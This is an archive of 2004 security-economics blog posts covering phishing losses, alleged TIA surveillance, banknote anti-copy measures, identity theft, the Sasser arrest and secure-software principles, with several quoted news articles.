    But Carroll said Wednesday that Microsoft already has a team called the Microsoft Security Response Center that monitors potential security threats to customers 24 hours a day, seven days a week.

    Meanwhile, other have suggested consumers and enterprises will stick with third-party antivirus vendors even if Microsoft launches its own competing product, especially given Microsoft's spotty security record to date.

    "In the consumer market, they [customers] may not be as savvy," said Tony Ursillo, an analyst with Loomis, Sayles & Co., which holds Symantec shares. But "I don't know if at least corporate customers will want to buy a product that patches the holes of another product sold by the same company."

    "I think it will be tricky" for Microsoft, Ursillo added.

    Posted by iang at 02:58 AM | Comments (4) | TrackBack

    June 15, 2004

    Phishing an epidemic, Browsers still snoozing

    Phishing, the sending of spoof emails to trick you into revealing your browser login passphrase, now seems to be the #1 threat to Internet users. A dubious award, indeed. An article in the New York Times claims that online identity theft caused damages of $5 billion worldwide, while spamming was a mere $3.5 billion [1]. That was last year, and phishing was just a sniffle then. Expect something like 20-30 billion this year in phishing, as now, we're facing an epidemic [2].

    That article also mentions that 5-20% of these emails work - the victim clicks through using that nice browser-email feature and enters their hot details into the bogus password harvesting site.

    Reported elsewhere today [3]:

    "Nearly 2 million Americans have had their checking accounts raided by criminals in the past 12 months, according to a soon-to-be released survey by market research group Gartner. Consumers reported an average loss per incident of $1,200, pushing total losses higher than $2 billion for the year."
    "Gartner researcher Avivah Litan blamed online banking for most of the problem."

    A recent phishing case in a Texas court gave something like $200 damages per victim [4]. That's a court case - so the figures can have some credibility. The FTC reports an average loss rate of about $5300 per victim for all identity theft [5].

    So we are clearly into the many many millions of dollars of damage. It is not out of the question that we are reaching for the billion dollar mark, especially if we add in the associated costs. The FTC reported about $53b of losses last year; while most of identity theft is non-Internet related, it only needs to be 10% of total identity theft to look like the NYT's figure of $5bn, above.

    Let's get our skepticisms up front here: I don't believe these figures. Firstly, they are reported quite loosely, with no backing. There is no pretence at academic seriousness. Secondly, they seem to derive from a bunch of vested interest players, such as mi2g.com and AFWG.org (both being peddlers of some sort of solution). Oh, and here's another group [6].

    We know that there is a shortage of reliable figures to go on. Having said that, even if the figures are way off, we still have a conclusion:

    This is real money, folks!

    Wake up time! This is actual fraud, money being taken from real average Internet users, people who download the email programs and browsers and web servers that many of us worked on and used. Forget the hypothetical attacks postulated by Internet security experts a decade or so back. Those attacks were not real, they were a figment of some academic's imagination.

    The security model built in to standard browsing is broken. Get over it, guys.

    Every year, since 2003, Americans will lose more money than was ever paid out to CAs for those certificates to protect them from MITM [7]. By the end of this year, Americans will have been defrauded - I predict - to the same extent as Verisign's peak in market cap.

    The secure browser falls to the MITM three ways that I know of - phishing, click thru syndrome, and substitute CA.

    The new (since 2002) phishing attack is a classical MITM that breaches secure browsing. This attack convinces some users to go to an MITM site. It's what happens when a false sense of security goes on to long. The fact that secure browsing falls to the MITM is unfortunate, but what's really sad is that the Internet security community declines to accept the failure of the SSL/CA/secure browsing model.

    Until this failure is recognised, there is no hope of moving on: What needs to be done is to realise that the browser is the front line of defence for the user - it's the only agent that knows anything about the user's browsing activity, and it's the only agent that can tell a new spoof site from an old, well-used and thus trusted site.

    Internet security people need to wind the clock forward by about a decade and start thinking about how to protect ordinary Internet users from the billions of dollars being taken from their pockets. Or not, as the case may be. But, in the meantime, let's just accept that the browser has a security model worth diddly squat. And start thinking about how to fix it.

    [1] New York Times, Online crime engenders a new hero: cybersleuth, 11th June 2004. (below)
    [2] Epidemic is defined as more than one article on an Internet fraud in Lynn Wheeler's daily list.
    http://seattlepi.nwsource.com/business/apbiz_story.asp?category=1310&slug=Japan%20Citibank
    http://www.epaynews.com/index.cgi?survey=&ref=browse&f=view&id=1087301938622215212&block=
    florida cartel stole identities of 1100 cardholders
    http://www.msnbc.msn.com/id/5184077/
    [3] http://www.msnbc.msn.com/id/5184077/
    Survey: 2 million bank accounts robbed
    [4] http://www.financialcryptography.com/mt/archives/000129.html
    "Cost of Phishing - Case in Texas"
    [5] http://www.ftc.gov/opa/2003/09/idtheft.htm
    FTC Releases Survey of Identity Theft in U.S.
    [6] http://www.reuters.com/financeNewsArticle.jhtml?type=governmentFilingsNews&story
    ID=5429333§ion=investing
    Large companies form group to fight "phishing"
    [7] Identity Theft - the American Disease
    http://www.financialcryptography.com/mt/archives/000146.html


    Online crime engenders a new hero: cybersleuth
    Christopher S. Stewart NYT

    Friday, June 11, 2004

    A lot of perfectly respectable small businesses are raking in money from
    Internet fraud.

    From identity theft to bogus stock sales to counterfeit prescription drugs,
    crime is rife on the Web. But what has become the Wild West for savvy
    cybercriminals has also developed into a major business opportunity for
    cybersleuths.

    The number of security companies that patrol the shady corners of the
    virtual world is small but growing.

    "As more and more crime is committed on the Internet, there will be growth
    of these services," said Rich Mogull, research director for information
    security and risk at Gartner, a technology-market research firm in Stamford,
    Connecticut.

    ICG, a Princeton, New Jersey, company founded in 1997, has grown to 35
    employees and projected revenue of $7 million this year from eight employees
    and $1.5 million in revenue just four years ago, said Michael Allison, its
    founder and chief executive.

    ICG, which is licensed as a private investigator in New Jersey, tracks down
    online troublemakers for major corporations around the world, targeting
    spammers and disgruntled former employees as well as scam artists, using
    both technology and more traditional cat-and-mouse tactics.

    "It's exciting getting into the hunt," said Allison, a 45-year-old British
    expatriate. "You never know what you're going to find. And when you identify
    and finally catch someone, it's a real rush."

    According to Mi2g, a computer security firm, online identity theft last year
    cost businesses and consumers more than $5 billion worldwide, while spamming
    drained $3.5 billion from corporate coffers. And those numbers are climbing,
    experts say.

    "The Internet was never designed to be secure," said Alan Brill, senior
    managing director at Kroll Ontrack, a technology services provider that was
    set up in 1985 by Kroll Associates, an international security company based
    in New York. "There are no guarantees."

    Kroll has seven crime laboratories around the world and is opening two more
    in the United States because of the growing demand for such work.

    ICG clients, many of whom Allison will not identify because of privacy
    agreements, include pharmaceutical companies, lawyers, financial
    institutions, Internet service providers, digital entertainment groups and
    telecommunication giants.

    One of the few cases that ICG can talk about is a spamming problem that
    happened a few years ago at Ericsson, the Swedish telecommunications
    company. Hundreds of thousands of e-mail messages promoting a telephone-sex
    service inundated its servers hourly, crippling the system.

    "They kept trying to filter it out," said Jeffrey Bedser, ICG chief
    operating officer. "But the spam kept on morphing and getting around the
    filter."

    Bedser and his team plugged the spam message into search engines and located
    other places on the Web where it appeared. Some e-mail addresses turned up,
    which led to a defunct e-fax Web site. And that Web site had in its registry
    the name of the spammer, who turned out to be a middle-aged man living in
    the Georgetown section of Washington.

    Several weeks later, the man was sued. He ultimately agreed to a $100,000
    civil settlement, though he didn't go away, Bedser said.

    "The guy sent me an e-mail that said, 'I know who you are and where you
    are,'" Bedser recalled. "He also signed me up for all kinds of spam and I
    ended up getting flooded with e-mail for sex and drugs for the next year."

    Allison says ICG's detective work is, for the most part, unglamorous,
    involving mostly sitting in front of computers and "looking for ones and
    zeros." Still, there are some private-eye moments. Computer forensic work,
    for instance, takes investigators to corporate offices all over America,
    sometimes in the dead of night.

    Searching through the hard drives of suspects - always with a company lawyer
    or executive present - the investigators hunt for "vampire data," or old
    e-mails and documents that the computer users thought they had deleted long
    ago.

    In some cases, investigators have to be a little bit sneaky themselves.
    Once, an ICG staffer befriended a suspect in a "pump-and-dump" scheme - in
    which swindlers heavily promote a little-known stock to get the price up,
    then sell their holdings at artificially high prices - by chatting with him
    electronically on a chess Web site.

    The Internet boom almost guarantees an unending supply of cybercriminals.
    "They're like mushrooms," Allison said.

    Right now, the most crowded fields of criminal activity are the digital
    theft of music and movies, illegal prescription-drug sales and "phishers,"
    identity thieves who pose as representatives of financial institutions and
    send out fake e-mails to people asking for their account information. The
    Anti-Phishing Working Group, an industry association, estimates that 5
    percent to 20 percent of recipients respond to these phony e-mails.

    In 2003, 215,000 cases of identity theft were reported to the Federal Trade
    Commission, an increase of 33 percent from the year before.

    This bad news for consumers is a growth opportunity for ICG. "The bad guys
    will always be out there," Allison said. "But we're getting better and
    better. And we're catching up quickly."

    The New York Times

    Posted by iang at 07:24 PM | Comments (3) | TrackBack

    June 10, 2004

    Big and Brotherly

    The White House administration has apparently defied the US Congress and kept the controversial "Total Information Awareness" going as a secret project. A politics journal called Capitol Hill Blue has exposed what it claims is the TIA project operating with no change.

    Whether this is all true, or just another anti-Bush story by Democrat apologists in the leadup to the election, is all open to question. Republican apologists can now chime in on cue. While they are doing that, here are some of the impressive claims of monitoring of the US citizen's habits:

    If you're looking for the fire, that's an awful lot of smoke. What does all this mean? Well, for one, it should start to put pressure on the open source crypto community to start loosening up. Pretty much all of that can be covered using free and easy techniques that have otherwise been eschewed for lack of serious threat models. I speak of course of using opportunistic cryptography to get protection deployed as widely as possible.

    This could take as back to the halcyon days of the 90s, when the open source community fought with the dark side to deploy crypto to all. A much more noble battle than today's windmill tinting against credit card thieves and other corporately inspired woftams. We didn't, it seems, succeed in protecting many people, as crypto remains widely undeployed, and where it is deployed, it is of uncertain utility. But, we're older and wiser now. Maybe it's time for another go



    From Capitol Hill Blue

    What Price Freedom?
    How Big Brother Is Watching, Listening and Misusing Information About You
    By TERESA HAMPTON & DOUG THOMPSON
    Jun 8, 2004, 08:19

    You're on your way to work in the morning and place a call on your wireless phone. As your call is relayed by the wireless tower, it is also relayed by another series of towers to a microwave antenna on top of Mount Weather between Leesburg and Winchester, Virginia and then beamed to another antenna on top of an office building in Arlington where it is recorded on a computer hard drive.

    The computer also records you phone digital serial number, which is used to identify you through your wireless company phone bill that the Defense Advanced Research Projects Agency already has on record as part of your permanent file.

    A series of sophisticated computer programs listens to your phone conversation and looks for "keywords" that suggest suspicious activity. If it picks up those words, an investigative file is opened and sent to the Department of Homeland Security.

    Congratulations. Big Brother has just identified you as a potential threat to the security of the United States because you might have used words like "take out" (as in taking someone out when you were in fact talking about ordering takeout for lunch) or "D-Day" (as in deadline for some nefarious activity when you were talking about going to the new World War II Memorial to recognize the 60th anniversary of D-Day).

    If you are lucky, an investigator at DHS will look at the entire conversation in context and delete the file. Or he or she may keep the file open even if they realize the use of words was innocent. Or they may decide you are, indeed, a threat and set up more investigation, including a wiretap on your home and office phones, around-the-clock surveillance and much closer looks at your life.

    Welcome to America, 2004, where the actions of more than 150 million citizens are monitored 24/7 by the TIA, the Terrorist Information Awareness (originally called Total Information Awareness) program of DARPA, DHS and the Department of Justice.

    Although Congress cut off funding for TIA last year, the Bush Administration ordered the program moved into the Pentagon's "black bag" budget, which is neither authorized nor reviewed by the Hill. DARPA also increased the use of private contractors to get around privacy laws that would restrict activities by federal employees.

    Six months of interviews with security consultants, former DARPA employees, privacy experts and contractors who worked on the TIA facility at 3701 Fairfax Drive in Arlington reveal a massive snooping operation that is capable of gathering - in real time - vast amounts of information on the day to day activities of ordinary Americans.

    Going on a trip? TIA knows where you are going because your train, plane or hotel reservations are forwarded automatically to the DARPA computers. Driving? Every time you use a credit card to purchase gas, a record of that transaction is sent to TIA which can track your movements across town or across the country.

    Use a computerized transmitter to pay tolls? TIA is notified every time that transmitter passes through a toll booth. Likewise, that lunch you paid for with your VISA becomes part of your permanent file, along with your credit report, medical records, driving record and even your TV viewing habits.

    Subscribers to the DirecTV satellite TV service should know - but probably don't - that every pay-per-view movie they order is reported to TIA as is any program they record using a TIVO recording system. If they order an adult film from any of DirecTV's three SpiceTV channels, that information goes to TIA and is, as a matter of policy, forwarded to the Department of Justice's special task force on pornography.

    "We have a police state far beyond anything George Orwell imagined in his book 1984," says privacy expert Susan Morrissey. "The everyday lives of virtually every American are under scrutiny 24-hours-a-day by the government."

    Paul Hawken, owner of the data information mining company Groxis, agrees, saying the government is spending more time watching ordinary Americans than chasing terrorists and the bad news is that they aren't very good at it.

    "It's the Three Stooges go to data mining school," says Hawken. "Even worse, DARPA is depending on second-rate companies to provide them with the technology, which only increases the chances for errors."

    One such company is Torch Concepts. DARPA provided the company with flight information on five million passengers who flew Jet Blue Airlines in 2002 and 2003. Torch then matched that information with social security numbers, credit and other personal information in the TIA databases to build a prototype passenger profiling system.

    Jet Blue executives were livid when they learned how their passenger information, which they must provide the government under the USA Patriot Act, was used and when it was presented at a technology conference with the title: Homeland Security - Airline Passenger Risk Assessment.

    Privacy Expert Bill Scannell didn't buy Jet Blue's anger.

    "JetBlue has assaulted the privacy of 5 million of its customers," said Scannell. "Anyone who flew should be aware and very scared that there is a dossier on them."

    But information from TIA will be used the DHS as a major part of the proposed CAPSII airline passenger monitoring system. That system, when fully in place, will determine whether or not any American is allowed to get on an airplane for a flight.

    JetBlue requested the report be destroyed and the passenger data be purged from the TIA computers but TIA refuses to disclose the status of either the report or the data.

    Although exact statistics are classified, security experts say the U.S. Government has paid out millions of dollars in out-of-court settlements to Americans who have been wrongly accused, illegally detained or harassed because of mistakes made by TIA. Those who accept settlements also have to sign a non-disclosure agreement and won't discuss their cases.

    Hawken refused to do business with DARPA, saying TIA was both unethical and illegal.

    "We got a lot of e-mails from companies - even conservative ones - saying, 'Thank you. Finally someone won't do something for money,'" he adds.

    Those who refuse to work with TIA include specialists from the super-secret National Security Agency in Fort Meade, MD. TIA uses NSA's technology to listen in on wireless phone calls as well as the agency's list of key words and phrases to identify potential terrorist activity.

    "I know NSA employees who have quit rather than cooperate with DARPA," Hawken says. "NSA's mandate is to track the activities of foreign enemies of this nation, not Americans."

    © Copyright 2004 Capitol Hill Blue

    Posted by iang at 04:57 PM | Comments (7) | TrackBack

    June 07, 2004

    New public DRM technique from the Central Banks

    Over in the UK, Bob Hettinga reports on an article in the Observer about how the EU legislators are preparing to mandate software and hardware to reject images of banknotes. Ya gotta hand it to the Europeans, they love fixing things with directives. Here's the technique:

    "The software relies on features built into leading currencies. Latest banknotes contain a pattern of five tiny circles. On the £20 note, they're disguised as a musical notation, on the euro they appear in a constellation of stars; on the new $20 note, the pattern is hidden in the zeros of a background pattern. Imaging software or devices detect the pattern and refuse to deal with the image."

    I think this is a great idea. I think we should all adopt this DRM technique for our imagery, and use the 5 circle pattern to stop people copying our logos, our holiday snaps, and our bedroom pictures posted on girlfriend swap sites.

    The best part is that, as the pattern is part of the asset base of the governments, we the people already own it.



    Security clampdown on the home PC banknote forgers

    Banks win EU support for software blocks to tackle the cottage counterfeiters
    Tony Thompson, crime correspondent - Observer
    Sunday June 6, 2004

    Computer and software manufacturers are to be forced to introduce new security measures to make it impossible for their products to be used to copy banknotes.

    The move, to be drafted into European Union legislation by the year end, follows a surge in counterfeit currency produced using laser printers, home scanners and graphics software. Imaging software and printers have become so powerful and affordable that production of fake banknotes has become a booming cottage industry.

    Though counterfeiters are usually unable to source the specialist paper on which genuine banknotes are printed, many are being mixed in with genuine notes in high volume batches. The copies are often good enough to fool vending machines. By using a fake £20 note to purchase a £2 rail fare, the criminal can take away £18 in genuine change.

    Although the Bank of England refuses to issue figures for the number of counterfeit notes in circulation and insists they represent a negligible fraction of notes issued, it also admits fakes are on the increase.

    Anti-counterfeiting software developed by the Central Bank Counterfeit Deterrence Group, an organisation of 27 leading world banks including the Bank of England, has been distributed free of charge to computer and software manufacturers since the beginning of the year. At present use of the software is voluntary though several companies have incorporated it into their products.

    The latest version of Adobe Photoshop, a popular graphics package, generates an error message if the user attempts to scan banknotes of main currencies. A number of printer manufactures have also incorporated the software so that only an inch or so of a banknote will reproduce, to be followed by the web address of a site displaying regulations governing the reproduction of money.

    The software relies on features built into leading currencies. Latest banknotes contain a pattern of five tiny circles. On the £20 note, they're disguised as a musical notation, on the euro they appear in a constellation of stars; on the new $20 note, the pattern is hidden in the zeros of a background pattern. Imaging software or devices detect the pattern and refuse to deal with the image.

    Certain colour copiers now come loaded with software that detects when a banknote has been placed on the glass, and refuses to make a copy or produces a blank sheet.

    Researchers at Hewlett Packard are to introduce technology that would allow printers to detect colours similar to those used in currency. The printer will automatically alter the colour so that the difference between the final product and a genuine banknote will be easily detectable by the naked eye.

    Adobe acted after it emerged that several counterfeiting gangs had used Photoshop to manipulate and enhance images. The security feature, which is not mentioned in any product documentation, has outraged users who say it could interfere with genuine artistic projects. There were also concerns that the software would automatically report duplication attempts to the software company or police via the internet.

    A spokesman for the National Criminal Intelligence Service said criminals traditionally used offset lithographic printing for counterfeiting. 'Developments in electrostatic photocopying equipment, together with advances in computer and reprographic technology, have led to a rise in the proportion of counterfeit notes produced in a domestic environment. The use of this technology generally results in a lower quality counterfeit, although this varies according to the skill of the counterfeiter and the equipment and techniques used.'

    Although some countries, most notably America, allow reproduction of banknotes for artistic purposes if they are either significantly larger or smaller than the real thing, in the UK it is a criminal offence to reproduce 'on any substance whatsoever, and whether or not on the correct scale', any part of any Bank of England banknote.

    Guardian Unlimited © Guardian Newspapers Limited 2004

    Posted by iang at 04:44 AM | Comments (8) | TrackBack

    May 25, 2004

    Identity Theft - the American Disease

    Identity theft is a uniquely American problem. It reflects the massive - in comparison to other countries - use of data and credit to manage Americans' lives. Other countries would do well to follow the experiences, as "what happens there, comes here." Here are two articles on the modus operandi of the identity thief [1], and the positive side of massive data collection [2].

    First up, the identity thief [1]. He's not an individual, he's a gang, or more like a farm. Your identity is simply a crop to process. Surprisingly, it appears that garbage collected from the streets (Americans call it trash) is still the seed material. Further, the database nation's targetting characteristics work for the thief as he doesn't need to "qualify" the victim any. If you receive lots of wonderful finance deals, he wants your business too.

    Once sufficient information is collected (bounties paid per paper) it becomes a process of using PCs and innocent address authorities to weezle ones way into the prime spot. For example, your mail is redirected to the farm, the right mails are extracted, and your proper mail is conveniently re-delivered - the classic MITM. We all know paper identity is worthless for real security, but it is still surprising to see how easily we can be brought in to harvest.

    [Addendum: Lynn Wheeler reports that a new study by Professor Judith Collins of Michigan State University reveals up to 70% of identity theft starts with employee insider theft [1.b]. This study, as reported by MSNBC, directly challenges the above article.]


    Next up, a surprisingly thoughtful article on how data collection delivers real value - cost savings - to the American society [2]. The surprise is in the author, Declan McCullagh, who had previously been thought to be a bit of a Barbie for his sallacious use of gossip in the paparazzi tech press. The content is good but very long.

    The real use of information is to make informed choices - not offer the wrong thing. Historically, this evolved as networks of traders that shared information. To counteract fraud that arose, traders kept blacklists and excluded no-gooders. A dealer exposed as misusing his position of power stood to lose a lot, as Adam Smith argued, far more indeed than the gain on any one transaction [3].

    In the large, merchants with businesses exposed to public scrutiny, or to American-style suits, can be trusted to deal fairly. Indeed, McCullagh claims, the US websites are delivering approximately the same results in privacy protection as those in Europe. Free market wins again over centralised regulations.

    Yet there is one area where things are going to pot. The company known as the US government, a sprawling, complex interlinking of huge numbers of databases, is above any consumer scrutiny and thus pressure for fair dealings. Indeed, we've known for some years that the policing agencies did an endrun around Congress' prohibition on databases by outsourcing to the private sector. The FBI's new purchase of your data from Checkpoint is "so secret that even the contract number may not be disclosed." This routine dishonesty and disrespect doesn't even raise an eyebrow anymore.


    Where do we go from here? As suggested, the challenge is to enjoy the benefits of massive data conglomeration without losing the benefit of privacy and freedom. It'll be tough - the technological solutions to identity frauds at all levels from financial cryptographers have not succeeded in gaining traction, probably because they are so asymmetric, and deployment is so complicated as to rule out easy wins. Even the fairly mild SSL systems the net community put in place in the '90s have been rampantly bypassed by phishing-based identity attacks, not leaving us with much hope that financial cryptographers will ever succeed in privacy protection [4].

    What is perhaps surprising is that we have in recent years redesigned our strong privacy systems to add optional identity tokens - for highly regulated markets such as securities trading [5]. The designs haven't been tested in the full, but it does seem as though it is possible to build systems that are both identity strong and privacy strong. In fact, the result seems to be stronger than either approach alone.

    But it remains clear that deployment against an uninterested public is a hard issue. Every company selling privacy to my knowledge has failed. Don't hold your breath, or your faith, and keep an eye on how this so-far American disease spreads to other countries.

    [1] Mike Lee & Brian Hitchen, "Identity Theft - The Real Cause,"
    http://www.ebcvg.com/articles.php?id=217
    [1.b] Bob Sullivan, "Study: ID theft usually an inside job,"
    http://www.msnbc.msn.com/id/5015565
    [2] Declan McCullagh, 'The upside of "zero privacy,"'
    http://www.reason.com/0406/fe.dm.database.shtml
    [3] Adam Smith, "Lecture on the Influence of Commerce on Manners," 1766.
    [4] I write about the embarrassment known as secure browsing here:
    http://iang.org/ssl/
    [5] The methods for this are ... not publishable just yet, embarrassingly.

    Posted by iang at 08:34 AM | Comments (6) | TrackBack

    May 22, 2004

    Peter Coffee on how to lose a security debate

    Over on eWeek.com, an Internet Magazine, a blog entry of mine seems to have hit home [1], and caused a response. Peter Coffee has written an article, "Report Takes Software Processes to Task [2]," that starts with "I feel as if I could get an entire year's worth of columns, or perhaps even build my next career, out of the material in a Task Force Report[3]..." Promising stuff !

    He then goes on to draw a couple of reasonable points from the report (how unprofessional security professionals are..., how security is multi-disciplinary...[4]) and then ruins his promising start by launching an ad hominem attack. Read it, it is mind bogglingly silly.

    I won't respond, other than to point out that real security professionals do not do the ad hominem ("against the man") as it distracts from the real debate of security. As he rightly intimated, security is substantially complex. As he apparently missed, this makes security very vulnerable to the sort of $50 million pork barrel projects that look good in a report, but miss the point of the complexity. And, Mr Coffee definitely missed that doing the ad hominem thing signalled that someone was upset at their pork being spiked. Sorry about that!

    Comments of any form are welcome, although I admit to being surprised at this one. Especially, if Mr Coffee would like to take up his claim to spend a year reading and benefitting from the report, I'll respond on the security aspects he raises.

    [1] Ian Grigg, "cybersecurity FUD," 05th April, 2004,
    http://www.financialcryptography.com/mt/archives/000107.html
    [2] Peter Coffee, "Report Takes Software Processes to Task," 22nd April, 2004,
    http://www.eweek.com/article2/0,1759,1571967,00.asp
    [3] National Cyber Security Partnership, "Security Across the Software Development Life Cycle,"
    http://www.cyberpartnership.org/SDLCFULL.pdf
    [4] Ian Grigg, "Financial Cryptography in 7 Layers," 4th Financial Cryptography Conference, 2000,
    http://iang.org/papers/fc7.html

    Posted by iang at 10:11 AM | Comments (3) | TrackBack

    May 14, 2004

    Ross Anderson's "Economics and Security Resource Page"

    For those interested in the intersection of security and economics, Ross Anderson's page has a wealth of links.

    "Do we spend enough on keeping `hackers' out of our computer systems? Do we not spend enough? Or do we spend too much? For that matter, do we spend too little on the police and the army, or too much? And do we spend our security budgets on the right things?"

    "The economics of security is a hot and rapidly growing field of research. More and more people are coming to realise that security failures are often due to perverse incentives rather than to the lack of suitable technical protection mechanisms. (Indeed, the former often explain the latter.) While much recent research has been on `cyberspace' security issues - from hacking through fraud to copyright policy - it is expanding to throw light on `everyday' security issues at one end, and to provide new insights and new problems for theoretical computer scientists and `normal' economists at the other. In the commercial world, as in the world of diplomacy, there can be complex linkages between security arguments and economic ends."

    "This page provides links..."

    Posted by iang at 06:07 AM | Comments (0) | TrackBack

    May 11, 2004

    Sassy Teenager Stars in Virus Soap

    In what is rapidly becoming an Internet soap opera, an alleged writer of the Sasser virus, 18 year old Sven Jaschan from Germany, was fingered under the Bounty program initiated by Microsoft a few months back [1]. As predicted, with $250,000 in prize money, an immediate question faces Microsoft: Are the informants in on the game [2] ?

    Microsoft insists that "the informant had no connection to the virus writer's work, and say they wouldn't pay a reward to anyone who had helped author the computer virus." Others are skeptical, both of the incident and the benefit of the program [3].

    Says one person: "In the last 15 years we've had 30 or 40 arrests of these people worldwide, and yet we still get 15 more of these (viruses) every week." The power of perception remains foremost here as all reporters routinely ignore the underlying structural weaknesses in the Microsoft platform that is being hit by virus after virus. Perhaps that story is stale.

    The German authorities released the author immediately, when they discovered that his intentions may have been honourable [4]. He was just helping his Mom, the papers say, and he deserves a medal, not prison:

    ' Despite the damage to millions of computers, one leading German newspaper said in a page one commentary Monday there was a strange sense of national pride that a German student had outwitted the world's best computer experts. "Many of the (German) journalists who traveled to the province could not help but harbor clandestine admiration for the effectiveness if the worm," Die Welt daily wrote.'

    American virus company NAI immediately responded with a call for new laws:

    'Jimmy Kuo, a research fellow with antivirus software maker NAI .... said that additional laws may be necessary to dissuade virus writers from releasing their programs onto the Internet. "We would hope that there could be laws that would prohibit the posting of malicious code," Kuo said. "Sasser was partially written by some malicious code that was downloaded by the Internet." [5]'

    They had their chance in 1945. But, there is good news - at least Microsoft announced a few years ago that security is its goal. I see no evidence in the browser market that they are serious, but I suppose we'll know more in 15 more years [6].


    Addendum: It seems that a week later, Police probe Sasser informant the informant was already on the way to losing his bounty. Question is, what happens now? What's the point in informing on a virus writer if your life gets turned upside down on the suspicion that you are in cohoots? Safer to go find some other line of work...



    [1] "'Sasser e' rears its head", 11 May 2004.
    [2] "The Good, The Bad, and the Ugly", 09 November 2003.
    [3] "Experts pessimistic on deterrent effect", 10 May 2004.
    [4] "German Net Worm Writer May Have Been Helping Mom", 10 May 2004.
    [5] "Fifth Sasser 'released before arrest'", 11 May 2004.
    [6] "Cost of Phishing - Case in Texas", 05 May 2004.

    Posted by iang at 07:07 AM | Comments (0) | TrackBack

    April 21, 2004

    Tumbleweed casts CA-signed cert lure

    The Feb issue of Nilson Report reports stats from the antiphishing.org WG. New for me at least, is some light thrown on Tumbleweed, the company behind the WG, which as suspected is casting itself as a solution to phishing.

    "Email Signatures [quoteth Nilson]. Tumbleweed is developing a method of using digital signature issued by a trusted Certificate Authority (CA) to sign emails. This type of technology, also being pursued by AOL, Microsoft, and Yahoo, would help thwart phishing scams. While crooks who own legitimate sounding domain names (such as Visa.customerservice.com) could still sign their messages, an alert would arrive with the email if the signature had not been issued by a CA. The larger problem with signing emails could come down the line as phishers migrate to other methods of luring victims. Some have already started using instant messaging. Next could be mobile messaging, banner ads, and sites that would turn up readily in a Google search. Beefing up law enforcement is another option, but with more and more phishers operating globally, it can take up to a week to ferret them out and shut them down."

    Well, Nilson picked up the obvious, so no need to dwell on it here. It then goes on to talk about Passmark, which I slammed in Phishing - and now the "solutions providers".

    What are we supposed to conclude from this parade of aspiring security beauties? One solution provider hasn't thought it through at all, and the other seems to be "just using CA-signed certs," the very technology that is being perverted in the first place. As if it hadn't thought it through at all...

    Is there no security company out there that does security? It is rather boring repeating the solution so I won't, today.

    Posted by iang at 10:13 AM | Comments (1) | TrackBack

    April 19, 2004

    Comdot from Beepcard

    Beepcard has developed ComdotTM, a self-powered electronic card that performs wireless authentication without using a card reader. The card transmits a user identification code to a PC, cell phone, or regular phone, enabling online authentication and physical presence in online transactions.

    Comdot supports payment card legacy systems, such as magnetic stripe readers, smart chips and embossing. It can be implemented as a standard credit card, a membership card, or a gift certificate, and works both on the Internet and in the offline world.

    The Comdot system will come as welcome relief to any system provider struggling to increase security rapidly on a mass scale, and to do so unobtrusively. ComdotTM is the ideal solution to the “reader” problem that has plagued mass deployment of smart cards. Indeed, these sound-based communications cards reach most transaction arenas that until now have been relegated to a status that the financial services world has always regarded as “card-not-present.” Also for healthcare organizations, transportation and communications networks and corporate computing systems, ComdotTM cards offer an important leap forward as an authentication scheme that is both secure and convenient.

    The "Reader-Free" Revolution

    How do we do it? By using "clientless" architecture and by creating an active, rather than passive, card device:

    Clientless architecture. Any standard home computer can talk to Comdot cards, as soon as the card software is installed. The sub-100k card communications software applet can be embedded in any service provider web page or e-wallet system or can reside within any other software that is permanently resident on a user's computer. Either way, installation is simple and neat. The web-based version installs automatically on the user's computer. The resident version comes with a wizard that installs onto the user's computer in seconds.

    ComdotTM Applications
    Comdot turns every PC or phone into a secure point of sale, enabling secure Internet shopping, banking, and financial account services. Comdot and accompanying software provide online value in several core operations, such as:

    Launch. One-click launch of web browser and direction to the card issuer's online services. One-click launch of e-wallets, online account services, or other value-added Internet services.

    Authenticate. Online authentication of users. The proliferation of Internet banking, stock portfolios, and application service providers of all sorts increases the need for online user authentication. Comdot is a low-cost, physical, first-factor user authentication device that replaces vulnerable and easy-to-forget passwords.

    Transact. Unprecedented physical presence in online transactions. The Beepcard card authenticates cardholders to their payment card issuers and e-merchants, greatly reducing the problem of on-line fraud. Because the presence of a Comdot card in transactions can be proven, cardholders shop online without fear of credit card theft. The result: increased consumer trust in e-commerce. The presence of Comdot technology in an online transaction reduces the likelihood of purchase dispute and repudiation.

    Posted by graeme at 02:30 PM | Comments (0) | TrackBack

    April 06, 2004

    Security Modelling

    One bright spot in the aforementioned report on cyber security is the section on security modelling [1] [2]. I had looked at this a few weeks back and found ... very little in the way of methadology and guidance on how to do this as a process [3]. The sections extracted below confirm that there isn't much out there, as well as listing what steps are know, and provide some references. FTR.

    [1] Cybersecurity FUD, FC Blog entry, 5th April 2004, http://www.financialcryptography.com/mt/archives/000107.html
    [2] Security Across the Software Development Lifecycle Task Force, _Improving Security Across the Software Development LifeCycle_, 1st April, 2004. Appendix B: PROCESSESTOPRODUCESECURESOFTWARE, 'Practices for Producing Secure Software," pp21-25 http://www.cyberpartnership.org/SDLCFULL.pdf
    [3] Browser Threat Model, FC Blog entry, 26th February 2004. http://www.financialcryptography.com/mt/archives/000078.html



    Principles of Secure Software Development

    While principles alone are not sufficient for secure software development, principles can help guide secure software development practices. Some of the earliest secure software development principles were proposed by Saltzer and Schroeder in 1974 [Saltzer]. These eight principles apply today as well and are repeated verbatim here:

    1. Economy of mechanism: Keep the design as simple and small as possible.
    2. Fail-safe defaults: Base access decisions on permission rather than exclusion.
    3. Complete mediation: Every access to every object must be checked for authority.
    4. Open design: The design should not be secret.
    5. Separation of privilege: Where feasible, a protection mechanism that requires two keys to unlock it is more robust and flexible than one that allows access to the presenter of only a single key.
    6. Least privilege: Every program and every user of the system should operate using the least set of privileges necessary to complete the job.
    7. Least common mechanism: Minimize the amount of mechanism common to more than one user and depended on by all users.
    8. Psychological acceptability: It is essential that the human interface be designed for ease of use, so that users routinely and automatically apply the protection mechanisms correctly.

    Later work by Peter Neumann [Neumann], John Viega and Gary McGraw [Viega], and the Open Web Application Security Project (http://www.owasp.org) builds on these basic security principles, but the essence remains the same and has stood the test of time.

    Threat Modeling

    Threat modeling is a security analysis methodology that can be used to identify risks, and guide subsequent design, coding, and testing decisions. The methodology is mainly used in the earliest phases of a project, using specifications, architectural views, data flow diagrams, activity diagrams, etc. But it can also be used with detailed design documents and code. Threat modeling addresses those threats with the potential of causing the maximum damage to an application.

